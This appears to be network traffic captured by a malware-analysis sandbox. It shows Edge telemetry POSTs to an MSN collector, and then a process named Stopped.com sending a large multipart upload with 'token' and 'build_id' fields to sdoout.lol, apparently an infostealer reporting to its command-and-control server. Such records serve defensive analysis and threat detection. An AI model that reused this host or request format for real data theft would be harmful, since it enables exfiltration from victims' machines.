                                                                                                                                                                                                                                                                                            Set-Cookie: MS0=ecf61ebf6fac46a995d78ef9c6b588eb; Domain=.microsoft.com; Expires=Tue, 31 Dec 2024 16:29:30 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                            time-delta-millis: 2455
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                            Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:30 GMT
                                                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            35192.168.2.550105104.46.162.2254435136C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:30 UTC1025OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735660768169&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                            Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                            Content-Length: 4841
                                                                                                                                                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                            Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                            Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                            Cookie: USRLOC=; MUID=2A5E9301422D68911D9D866743856932; _EDGE_S=F=1&SID=12141DD01C6B6C930BE408B61D416DDA; _EDGE_V=1
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:30 UTC4841OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 33 31 54 31 35 3a 35 39 3a 32 38 2e 31 36 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 64 36 64 35 38 64 61 34 2d 62 39 34 30 2d 34 30 32 63 2d 61 33 38 34 2d 65 66 31 39 63 61 63 38 35 33 39 39 22 2c 22 65 70 6f 63 68 22 3a 22 32 30 30 36 37 38 39 39 36 35 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                            Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-31T15:59:28.169Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"d6d58da4-b940-402c-a384-ef19cac85399","epoch":"2006789965"},"app":{"locale
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:30 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                            P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                            Set-Cookie: MC1=GUID=f8affd593ce744bdaf01b8f73397bd13&HASH=f8af&LV=202412&V=4&LU=1735660770654; Domain=.microsoft.com; Expires=Wed, 31 Dec 2025 15:59:30 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                            Set-Cookie: MS0=03983ead10e145858e8df506617d2ca0; Domain=.microsoft.com; Expires=Tue, 31 Dec 2024 16:29:30 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                            time-delta-millis: 2485
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                            Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:30 GMT
                                                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            36192.168.2.564412104.46.162.2254435136C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:31 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735660768810&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                            Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                            Content-Length: 5418
                                                                                                                                                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                            Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                            Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                            Cookie: USRLOC=; MUID=2A5E9301422D68911D9D866743856932; _EDGE_S=F=1&SID=12141DD01C6B6C930BE408B61D416DDA; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:31 UTC5418OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 33 31 54 31 35 3a 35 39 3a 32 38 2e 38 30 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 64 36 64 35 38 64 61 34 2d 62 39 34 30 2d 34 30 32 63 2d 61 33 38 34 2d 65 66 31 39 63 61 63 38 35 33 39 39 22 2c 22 65 70 6f 63 68 22 3a 22 32 30 30 36 37 38 39 39 36 35 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                            Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-31T15:59:28.809Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"d6d58da4-b940-402c-a384-ef19cac85399","epoch":"2006789965"},"app":{"locale
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:31 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                            P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                            Set-Cookie: MC1=GUID=0fd0875b6d4f46678817821b1ec706db&HASH=0fd0&LV=202412&V=4&LU=1735660771664; Domain=.microsoft.com; Expires=Wed, 31 Dec 2025 15:59:31 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                            Set-Cookie: MS0=162af85b04174ecbb2d6c240986aa108; Domain=.microsoft.com; Expires=Tue, 31 Dec 2024 16:29:31 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                            time-delta-millis: 2854
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                            Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:31 GMT
                                                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            37192.168.2.564413104.46.162.2254435136C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:31 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735660769173&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                            Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                            Content-Length: 9879
                                                                                                                                                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                            Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                            Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                            Cookie: USRLOC=; MUID=2A5E9301422D68911D9D866743856932; _EDGE_S=F=1&SID=12141DD01C6B6C930BE408B61D416DDA; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:31 UTC9879OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 33 31 54 31 35 3a 35 39 3a 32 39 2e 31 37 32 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 64 36 64 35 38 64 61 34 2d 62 39 34 30 2d 34 30 32 63 2d 61 33 38 34 2d 65 66 31 39 63 61 63 38 35 33 39 39 22 2c 22 65 70 6f 63 68 22 3a 22 32 30 30 36 37 38 39 39 36 35 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                                                                                                                                            Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-31T15:59:29.172Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"d6d58da4-b940-402c-a384-ef19cac85399","epoch":"2006789965"},"app":{"loc
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:32 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                            P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                            Set-Cookie: MC1=GUID=abc89f44b4f04d95baa5fa9cf899dff1&HASH=abc8&LV=202412&V=4&LU=1735660771654; Domain=.microsoft.com; Expires=Wed, 31 Dec 2025 15:59:31 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                            Set-Cookie: MS0=9adc3ba6da334d0eaa8a44b33071dd5d; Domain=.microsoft.com; Expires=Tue, 31 Dec 2024 16:29:31 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                            time-delta-millis: 2481
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                            Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:31 GMT
                                                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            38192.168.2.564416116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:32 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----d2nyc2nozmo8qq168q9h
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 131557
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:32 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 64 32 6e 79 63 32 6e 6f 7a 6d 6f 38 71 71 31 36 38 71 39 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 64 32 6e 79 63 32 6e 6f 7a 6d 6f 38 71 71 31 36 38 71 39 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 64 32 6e 79 63 32 6e 6f 7a 6d 6f 38 71 71 31 36 38 71 39 68 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------d2nyc2nozmo8qq168q9hContent-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------d2nyc2nozmo8qq168q9hContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------d2nyc2nozmo8qq168q9hCont
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
